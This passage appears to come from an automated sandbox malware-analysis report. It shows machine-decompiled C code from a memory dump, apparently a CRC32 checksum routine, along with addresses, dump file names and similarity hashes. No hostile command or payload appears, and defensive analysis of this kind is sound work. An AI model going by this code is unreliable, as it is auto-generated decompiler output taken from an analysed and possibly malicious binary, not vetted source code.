0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x18) * 4) ^  *(0x4141c8 + (_t162 & 0x000000ff) * 4) ^ _t257[6]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t248 >> 0x18) * 4) ^  *(0x4141c8 + (_t248 & 0x000000ff) * 4) ^ _t257[7];
						_t257 =  &(_t257[8]);
						_t98 =  *(0x4149c8 + (( *(0x4149c8 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t167 >> 0x18) * 4) ^  *(0x4141c8 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t167 >> 0x18) * 4) ^  *(0x4141c8 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t167 >> 0x18) * 4) ^  *(0x4141c8 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x18) * 4) ^  *(0x4141c8 + (_t253 & 0x000000ff) * 4);
						_t262 = _t262 - 1;
					} while (_t262 != 0);
				}
				if(_t259 >= 4) {
					_t152 = _t259 >> 2;
					do {
						_t103 = _t98 ^ _t257[1];
						_t257 =  &(_t257[1]);
						_t259 = _t259 - 4;
						_t98 =  *(0x4149c8 + (_t103 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t103 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t103 >> 0x18) * 4) ^  *(0x4141c8 + (_t103 & 0x000000ff) * 4);
						_t152 = _t152 - 1;
					} while (_t152 != 0);
				}
				_t258 =  &(_t257[1]);
				if(_t259 != 0) {
					do {
						_t178 =  *_t258 & 0x000000ff;
						_t258 =  &(_t258[1]);
						_t98 = _t98 << 0x00000008 ^  *(0x4141c8 + (_t98 >> 0x00000018 ^ _t178) * 4);
						_t259 = _t259 - 1;
					} while (_t259 != 0);
				}
				return ( !_t98 >> 0x18) + (( !_t98 & 0x0000ff00) + ( !_t98 << 0x10) << 8) + (_t99 >> 0x00000008 & 0x0000ff00);
			}

0x004102f0
0x0041030b
0x0041031b
0x00410321
0x00410326
0x00410328
0x0041032d
0x00410335
0x0041033b
0x00410342
0x00410343
0x00000000
0x00000000
0x00000000
0x00410343
0x00410328
0x00410345
0x00410345
0x0041034b
0x00410354
0x00410357
0x00410484
0x004104b6
0x004104c3
0x004104c6
0x00410536
0x0041053d
0x0041053d
0x00410544
0x00410548
0x0041054c
0x00410550
0x00410550
0x00410553
0x0041055d
0x00410593
0x00410595
0x00410595
0x00410550
0x00410598
0x0041059d
0x004105a0
0x004105a0
0x004105a3
0x004105b0
0x004105b7
0x004105b7
0x004105a0
0x004105e3

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a707402405e659f98bc40317dd1cd0cc62b6214a4faa6fed308a5dafce6d2b
Instruction ID: 1429709298f1008899e87f6c3b3879e7121ea009d7144b8a16b77f0414586c87
Opcode Fuzzy Hash: 52a707402405e659f98bc40317dd1cd0cc62b6214a4faa6fed308a5dafce6d2b
Instruction Fuzzy Hash: C171AF726208524BE718CF2DECE06763353E7D9312B4BC738DB4187796C638E962D694

Uniqueness

Uniqueness Score: -1.00%

Function 004102D0, Relevance: .2, Instructions: 193
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004102D0() {
				intOrPtr _t93;
				signed int _t95;
				signed char _t98;
				signed char _t146;
				signed int* _t164;
				signed int _t165;
				signed int _t202;
				signed char _t234;
				unsigned int _t236;
				unsigned int _t241;
				signed int* _t242;
				signed int* _t243;
				unsigned int _t246;
				void* _t248;

				_t93 =  *((intOrPtr*)(_t248 + 8));
				if(_t93 != 0) {
					 *((intOrPtr*)(_t248 + 8)) = _t93;
					_t146 =  *(_t248 + 0xc);
					_t95 =  !( *(_t248 + 4));
					_t236 =  *(_t248 + 0x14);
					if(_t236 != 0) {
						while((_t146 & 0x00000003) != 0) {
							_t202 =  *_t146 & 0x000000ff;
							_t146 = _t146 + 1;
							_t95 = _t95 >> 0x00000008 ^  *(0x4131c8 + ((_t202 ^ _t95) & 0x000000ff) * 4);
							_t236 = _t236 - 1;
							if(_t236 != 0) {
								continue;
							}
							goto L6;
						}
					}
					L6:
					if(_t236 >= 0x20) {
						_t246 = _t236 >> 5;
						do {
							_t219 =  *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4);
							 *(_t248 + 0x18) = _t146 + 8;
							_t242 =  *(_t248 + 0x18);
							_t229 =  *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x413dc8 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (_t219 >> 0x18) * 4) ^  *(0x413dc8 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + (( *(0x4135c8 + (( *(0x4135c8 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4131c8 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x413dc8 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4139c8 + (( *(0x4135c8 + 